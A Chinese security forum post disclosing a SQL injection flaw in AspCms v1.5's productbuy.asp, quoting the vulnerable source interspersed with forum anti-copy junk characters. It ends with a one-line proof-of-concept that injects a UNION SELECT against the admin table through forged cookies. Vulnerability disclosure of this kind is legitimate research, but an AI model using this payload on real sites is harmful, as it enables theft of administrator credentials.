找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2378|回复: 0
打印 上一主题 下一主题

AspCms_v1.5_20110517 SQL注射漏洞及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:35:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好久没上土司了,上来一看发现在删号名单内.....4 e/ `5 @( W5 k% V9 F
也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。
" }$ z& f  o7 @; W废话不多说,看代码:
' b4 N: P5 I6 s4 {& R) G8 A9 A: |' m; `
<%
2 y. Y( \/ E! w1 W2 g( P
! ]+ y1 k6 B& v  U, v5 ^" V' mif action = "buy" then# {! {0 Y! N+ Z' z& `$ H

6 l- P6 I  V! h6 `  O/ m- }( _        addOrder()
1 u- d" X  Q* n  c
0 f( N% K. ?* X4 {# i2 Selse
( V7 S3 }; U, ^6 v( l/ g' f4 O0 k! _3 Q
        echoContent()
9 n8 t+ \) R1 {: g5 u- C  k0 w
* F8 x& D/ E! p( W& n9 r* Dend if' T6 \1 r* \$ o5 X4 G  e

  K" m" C6 M8 [  X! J* ~
" g+ V& y& k+ P. ?
( ?1 I4 ~* I- l. C4 }  F# k……略过
4 i4 x9 z; a. J5 `  _! W% M* b9 e# ^- ^/ a# R7 }9 l

) M; g2 w  `3 I, H! B4 Y- G
# o0 ^: L# s9 \) vSub echoContent()' M% D5 S$ {  G! L3 \! S

% L9 Q  F/ Z6 K5 ?6 R        dim id% o* H$ I  m! Q* d( M; Y" P/ M
" H. N3 w: \  q1 |1 t) h: k( G
        id=getForm("id","get")
( ~5 }4 ]8 }+ Y& _) Y. P2 C- T) J; \! r; h- B" I- O, m8 ^9 z
        - s! [( V/ `; Z# _) [) t0 Z, X. b
! H& E4 T% x; b: R5 b
        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1"
5 W2 _8 v" N: [# P1 i; ]& X3 t5 I/ A( H4 [" F
        
, h% f! t; O% D. D% m; W
& s4 j8 P# u! q, u% i4 c        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")+ s: z! w  j/ p" ^; A

+ J: o9 K# h$ G8 B" \5 [7 K        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct$ W1 d( v: B2 P; X( ]
( O( x* k  h6 I6 ]. A
        Dim templatePath,tempStr! E" c( L. H  f7 l* U$ u

+ R* g6 T2 ~8 W) a9 r        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
2 ?$ J- Z* W9 g/ q! Q
0 L- p: A, M, M: x. O8 F+ d
) `9 Q) Z% O# ~
- l8 d( G& N8 w/ q5 v8 t# `9 u" T        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
! I. n7 C: F( a0 G" f! G& f4 \: @1 h. C& z/ F
        selectproduct=rsObj(0)
' R' p. Z( I; q8 q/ N' g
2 G* O% T! d$ _: G" h+ N        3 m0 j* _- |- a3 w; y) l' F
) w" G4 l* v) W' \) ?9 q+ U6 i2 I
        Dim linkman,gender,phone,mobile,email,qq,address,postcode7 h1 ^8 s& ]& x) L

3 r8 \5 Z& s) S) b        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0
. d& ~' R8 i9 _; z* }2 [& |% |/ b. {* U
        if rCookie("loginstatus")=1 then  9 |3 A# E: E4 _" ]; P( _1 j

- v2 D( g) Q/ x7 {. H                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")% I1 B" }, N" [+ P4 Y5 p

- d2 Q$ M, w# O/ U! Y) a; g/ z                linkman=rsObj("truename")
% M. {  m. b; S7 _9 E3 A7 X, J. K  v* Q; F; X' i4 Z4 B7 b
                gender=rsObj("gender")0 B4 s) J& A& f6 `

( _  T1 O+ A. p5 H" Y- Q; Q- t                phone=rsObj("phone")8 z& U3 _8 C+ O$ F' P) a' o9 X

! h: L( x$ u- V6 {) f                mobile=rsObj("mobile")
$ r) f% y# Y7 J! ^3 @0 B# p6 K* ~$ D2 t& {9 i
                email=rsObj("email")/ K+ r3 m: s% l) f; q
4 I" \" C: C7 j/ W& R
                qq=rsObj("qq")
% M  @( r1 {  A8 r. [0 R
# {2 M( Z* h2 H) U                address=rsObj("address")! Y$ ^; D6 d' s1 D/ t
' u4 h+ U# G2 {
                postcode=rsObj("postcode")
2 G- O3 ?0 i1 }. Q# e
7 a3 ^  g5 G6 T" P        else
( t2 O$ F% C2 w) F8 J
$ z  [) {& d4 s                gender=1' P) }/ j# |- P: L5 |8 y/ d
4 K) E6 V1 Q7 J
        end if
4 J1 M) i+ i5 ~
1 t5 D/ C7 V1 E! x+ o- |        rsObj.close()% o! Y% z1 h- _' i

/ }; n: K- `$ U+ b                # W8 ^9 f; M( o

* B* o* k! S6 Y6 x        with templateObj & m$ s) Z4 {' z. x
( n: L) Q- s6 ?% A* J! z. D; r
                .content=loadFile(templatePath)        
- s  j: ]/ g# x2 t- {
4 y+ ]1 o6 x! q9 L4 ~5 {$ g                .parseHtml()
- m* Q/ W3 ?: H  c% C6 e
- G6 L3 k* H) L3 }  o                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)  Q/ z4 E# s1 X+ r7 j% P! h+ ?
# t9 e' b+ w% o. s0 A0 K& s
                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               
( q$ }& W' _+ `/ m' u% {! H% e& M/ G, n
                .content=replaceStr(.content,"[aspcms:gender]",gender)               
" ^' @+ O, I$ O4 P8 V; u8 k) a' a$ |" Z( ~/ {9 Z
                .content=replaceStr(.content,"[aspcms:phone]",phone)                " T  N) X8 A% @1 C3 O1 ?

- G+ N' G& t1 [                .content=replaceStr(.content,"[aspcms:mobile]",mobile)                4 g. [, q7 X& a; E' \
7 r4 H1 L. S; t2 p
                .content=replaceStr(.content,"[aspcms:email]",email)                        & f1 L+ B, g! A2 y9 r& k- U) ?
9 D' [) }% ^7 j8 [! q  D: T- f, |
                .content=replaceStr(.content,"[aspcms:qq]",qq)                        
/ }  V: G: O' r8 P
; K' E; g; S8 h! ]5 {8 Y4 K$ M                .content=replaceStr(.content,"[aspcms:address]",address)                        / y9 p; S# K: V

6 A) `+ @. B; v+ q2 [                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        
7 M1 t8 e/ L: ]$ ]2 s. J' x/ O+ F  [+ W% r# E8 {
                .parseCommon()                 & k: `' f5 {  ?% P  b

7 R4 {4 V3 X4 z                echo .content * u7 K4 h1 w- T/ g. h% a
; g9 H- ^) f) s  N2 K+ T
        end with- y6 |. l: K1 G# r: n+ P' t

3 V8 n% ~, t; d7 N        set templateobj =nothing : terminateAllObjects
7 q8 b' C) R: |  D3 p4 V1 K' W4 r2 q# ~+ W, X' f
End Sub
( {: E1 e4 }) Y  ]0 t, u. g; @+ R9 ]漏洞很明显,没啥好说的& W! k) ?: N7 O* `8 e. q
poc:2 `( T7 A- G4 e
6 _4 `: I5 P; Y5 ], y+ c, @- _, _
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子​( b5 Y, H( o& h( ?% u6 U

, U/ I; @2 g* ~3 s1 P1 P5 y2 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表